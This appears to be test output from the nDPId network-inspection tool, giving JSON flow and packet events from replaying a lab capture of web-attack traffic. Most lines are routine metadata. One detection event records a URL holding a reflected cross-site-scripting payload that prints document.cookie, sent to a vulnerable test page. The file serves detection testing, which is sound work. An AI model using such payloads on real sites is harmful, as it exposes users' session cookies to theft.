-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347292725,"flow_last_seen":1499347298700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55646,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347292725,"flow_last_seen":1499347298700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55646,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347417243,"flow_last_seen":1499347417243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347417243,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1499347417243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347417243,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82KJAAD4G7S2sEAABwKgKMt6GAFDK0UZQAAAAAKACchDO3gAAAgQFtAQCCAoBOp7yAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3742,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":2,"flow_last_seen":1499347417244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347417244,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3oZtyr1sytFGUaAScSAwOgAAAgQFtAQCCAoD5HBoATqe8gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":3,"flow_last_seen":1499347417244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347417244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02KNAAD4G7TSsEAABwKgKMt6GAFDK0UZRbcq9bYAQAOXPQAAAAQEICgE6nvMD5HBo"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3753,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347418519,"flow_last_seen":1499347418519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347418519,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3753,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1499347418519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347418519,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8f6JAAD4GRi6sEAABwKgKMt6UAFCK5d+TAAAAAKACchB0OgAAAgQFtAQCCAoBOqAxAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3754,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":2,"flow_last_seen":1499347418519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347418519,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3pQDHUU3iuXflKAScSC3OQAAAgQFtAQCCAoD5HGnATqgMQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":3,"flow_last_seen":1499347418520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347418520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0f6NAAD4GRjWsEAABwKgKMt6UAFCK5d+UAx1FOIAQAOVWQQAAAQEICgE6oDED5HGn"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3768,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347419786,"flow_last_seen":1499347419786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347419786,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3768,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1499347419786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347419786,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QexAAD4Gg+SsEAABwKgKMt6iAFBxNOCCAAAAAKACchCLsQAAAgQFtAQCCAoBOqFuAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":2,"flow_last_seen":1499347419786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347419786,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3qLCWbCfcTTgg6AScSCizgAAAgQFtAQCCAoD5HLkATqhbgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":1499347419787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347419787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Qe1AAD4Gg+usEAABwKgKMt6iAFBxNOCDwlmwoIAQAOVB1gAAAQEICgE6oW4D5HLk"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3777,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347421069,"flow_last_seen":1499347421069,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347421069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3777,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1499347421069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347421069,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88e9AAD4G0+CsEAABwKgKMt6wAFBX5lNAAAAAAKACchAw8wAAAgQFtAQCCAoBOqKvAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3778,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":2,"flow_last_seen":1499347421069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347421069,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3rDPNYnSV+ZTQaAScSBgwQAAAgQFtAQCCAoD5HQkATqirwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3779,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":3,"flow_last_seen":1499347421069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347421069,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08fBAAD4G0+esEAABwKgKMt6wAFBX5lNBzzWJ04AQAOX\/yAAAAQEICgE6oq8D5HQk"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347422332,"flow_last_seen":1499347422332,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347422332,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1499347422332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347422332,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Nl1AAD4Gj3OsEAABwKgKMt6+AFBNkZW3AAAAAKACchD3hwAAAgQFtAQCCAoBOqPqAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3787,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":2,"flow_last_seen":1499347422332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347422332,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3r7LRREdTZGVuKAScSCivwAAAgQFtAQCCAoD5HVgATqj6gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3788,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":3,"flow_last_seen":1499347422333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347422333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Nl5AAD4Gj3qsEAABwKgKMt6+AFBNkZW4y0URHoAQAOVBxgAAAQEICgE6o+sD5HVg"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347423604,"flow_last_seen":1499347423604,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347423604,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1499347423604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347423604,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TspAAD4GdwasEAABwKgKMt7MAFD5I+viAAAAAKACchD0fQAAAgQFtAQCCAoBOqUoAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3802,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":2,"flow_last_seen":1499347423604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347423604,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3szh681K+SPr46AScSDLowAAAgQFtAQCCAoD5HaeATqlKAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":3,"flow_last_seen":1499347423605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347423605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TstAAD4Gdw2sEAABwKgKMt7MAFD5I+vj4evNS4AQAOVqqgAAAQEICgE6pSkD5Hae"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347419786,"flow_last_seen":1499347423605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347423605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AA0U7VCIO18AUKPZNB0ZXFCDF9PVHM0BRGOWM22EICNEPXK5UC%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347295224,"flow_last_seen":1499347300701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55672,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347295224,"flow_last_seen":1499347300701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55672,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347296462,"flow_last_seen":1499347301701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347296462,"flow_last_seen":1499347301701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347297732,"flow_last_seen":1499347303701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55700,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347297732,"flow_last_seen":1499347303701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55700,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347300263,"flow_last_seen":1499347305701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55726,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347300263,"flow_last_seen":1499347305701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55726,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347301520,"flow_last_seen":1499347306702,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55740,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347301520,"flow_last_seen":1499347306702,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55740,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347304125,"flow_last_seen":1499347309703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347304125,"flow_last_seen":1499347309703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3820,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347426122,"flow_last_seen":1499347426122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347426122,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3820,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1499347426122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347426122,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vtlAAD4GBvesEAABwKgKMt7mAFDtahlHAAAAAKACchDQQgAAAgQFtAQCCAoBOqeeAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3821,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":2,"flow_last_seen":1499347426122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347426122,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3ub5Z5wJ7WoZSKAScSC+twAAAgQFtAQCCAoD5HkUATqnngEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3822,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":3,"flow_last_seen":1499347426122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347426122,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vtpAAD4GBv6sEAABwKgKMt7mAFDtahlI+WecCoAQAOVdvwAAAQEICgE6p54D5HkU"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347427366,"flow_last_seen":1499347427366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347427366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1499347427366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347427366,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UGVAAD4GdWusEAABwKgKMt70AFC9kfiwAAAAAKACchAfbQAAAgQFtAQCCAoBOqjVAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3833,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":2,"flow_last_seen":1499347427366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347427366,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3vS8sHHovZH4saAScSBzgwAAAgQFtAQCCAoD5HpLATqo1QEDAwc="} 